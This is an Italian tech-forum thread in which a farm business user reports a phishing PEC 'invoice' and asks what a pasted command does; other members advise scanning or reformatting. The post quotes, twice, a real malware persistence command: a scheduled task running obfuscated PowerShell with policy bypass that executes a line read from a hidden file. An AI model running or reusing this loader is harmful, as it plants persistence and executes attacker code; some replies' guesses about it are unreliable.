Aperti file sospetti arrivati con PEC. Molto probabilmente un virus. Come eliminare il rischio?

nixa

Nuovo Utente
Buongiorno
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?

Grazie
 

Robertob89

Moderatore
Staff Forum
4,135
2,287
Hardware Utente
CPU
Ryzen 5 3600 @ 4.2ghz 1.35v
Dissipatore
Custom Loop: wb cpu e gpu EK+HL gts 360/240
Scheda Madre
Asus Prime X470 Pro
Hard Disk
Samsung 960 Evo + Samsung 850 Evo
RAM
16 gb G skill Trident 3200mhz CL16
Scheda Video
Evga 1080TI Sc Black Gaming OC
Monitor
Acer Predator 27" 144hz 1440p IPS
Alimentatore
Evga 650W SuperNova G2
Case
Cooler Master H500M
Sistema Operativo
Win 10 Pro 64 bit
1 - Come fai a sapere che non si apre? Hai provato ad aprirlo? Se sì, al 99% sei infettato
2 - Idem per il link. Se lo hai aperto.. tanti auguri.
3 - Il comando sembra partire con un copiare i file da una cartella ad un'altra bypassando qualcosa ma non asprei dirti di più.
4 - Norton Security è l'AV peggiore che esista sul mercato
 

meiyo

Utente Èlite
2,228
814
Hardware Utente
CPU
FX8350@4500
Dissipatore
UN VECCHIO DINOSAURO THERMALTAKE
Scheda Madre
ASUS 970 PRO GAMING AURA
Hard Disk
M2 NVME 970EVO + SSD CRUCIAL MX500
RAM
GSKYLL TRIDENT 2133 16GB
Scheda Video
ASUS ROG PLATINUM GTX760
Scheda Audio
integrata
Monitor
LG FULL-HD
Alimentatore
LEPA 1000W
Case
BANCHETTO DIMASTECH EASY V3
Internet
FIBRA TIM 30MEGA
Sistema Operativo
Windows 7 Ultimate 64Bit+ WINDOWS 10 PRO
Buongiorno
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?

Grazie
Ma l'indirizzo mail dal quale proveniva questo messaggio lo conoscevate? Perché se non era un vostro cliente io non avrei mai aperto.
Comunque ad un mio cliente cosa simile avvenuta tramite pec e pur avendo kaspersky attivo si è installato un task che favoriva eventuali intrusioni.
Dato che io non mi sono fidato, ho consigliato al cliente visto che avevamo una immagine recente, di ripristinare e di aggiornare tramite i dati di backup giornalieri
 

nixa

Nuovo Utente
Buongiorno, Grazie per le risposte. Purtroppo aperti sia file che link. Ho trovato il task avviato nell' scheduler e l'ho deregistrato. Ora il task non si riesegue. Come dicevo i file messi su siti di controllo di multipli antivirus non risultano nocivi ma io sono sicuro che sono virus. Vorrei evitare se possibile di formattare il PC. Come mi consigliate di "pulirlo"?
P.S. il file p7z è firmato con firma valida mi pare dalla regione Toscana quindi la pec sembrava vera, quindi chi ha fatto sto virus ha fatto anche firmare in qualche modo da un account Aruba la cosa.
 

Ibernato

Utente Èlite
3,880
1,733
Hardware Utente
Sistema Operativo
Windows 10 Pro
Buongiorno, Grazie per le risposte. Purtroppo aperti sia file che link. Ho trovato il task avviato nell' scheduler e l'ho deregistrato. Ora il task non si riesegue. Come dicevo i file messi su siti di controllo di multipli antivirus non risultano nocivi ma io sono sicuro che sono virus. Vorrei evitare se possibile di formattare il PC. Come mi consigliate di "pulirlo"?
P.S. il file p7z è firmato con firma valida mi pare dalla regione Toscana quindi la pec sembrava vera, quindi chi ha fatto sto virus ha fatto anche firmare in qualche modo da un account Aruba la cosa.
Non conosco i comandi esatti di quello script ma io eviterei di inserire formazioni importanti, vista la situazione.
Prova ad eseguire le scansioni qui: https://forum.tomshw.it/threads/procedura-scansioni-preliminari.736474/
Ma io ti consiglio di formattare :)
Perchè aprire file che arrivano da fonti sconosciute?
Fallo in una macchina virtuale almeno (anche se alcuni malware riescono a bypassare anche la VM)
 

Dragondj

Utente Attivo
149
31
Hardware Utente
CPU
amd phenom II X2 550, 3.1Ghz
Scheda Madre
Asrock N68-S
Hard Disk
WD Caviar Green - 1 TB
RAM
kingston 4 GB 800 Mhz no-ecc cl5
Scheda Video
ATI Sapphire hd 3450
Scheda Audio
Via - VT1705
Monitor
Philips LCD 17"
Alimentatore
500 W
Case
Sarà cinese non c'è sritto niente
Sistema Operativo
Windows 7 Ultimate 64 bit
Di quanti kB era il pdf? e il link? Probabilmente se sono troppo piccoli di dimensione passano inosservati nell'analisi dell av.
Almeno una volta era cosi ora se hanno fixato il bug non saprei.
Inviato da SM-G930F tramite App ufficiale di Tom\'s Hardware Italia Forum
 

meiyo

Utente Èlite
2,228
814
Hardware Utente
CPU
FX8350@4500
Dissipatore
UN VECCHIO DINOSAURO THERMALTAKE
Scheda Madre
ASUS 970 PRO GAMING AURA
Hard Disk
M2 NVME 970EVO + SSD CRUCIAL MX500
RAM
GSKYLL TRIDENT 2133 16GB
Scheda Video
ASUS ROG PLATINUM GTX760
Scheda Audio
integrata
Monitor
LG FULL-HD
Alimentatore
LEPA 1000W
Case
BANCHETTO DIMASTECH EASY V3
Internet
FIBRA TIM 30MEGA
Sistema Operativo
Windows 7 Ultimate 64Bit+ WINDOWS 10 PRO
Da quando è uscito WANNACRY tutte le suite antivirus hanno lavorato egregiamente.
Il problema non è l'antivirus, siamo noi, il nostro problema è la nostra curiosità cheuci spinge a partecipare alla gara "il mouse più veloce del West"
 

Entra

oppure Accedi utilizzando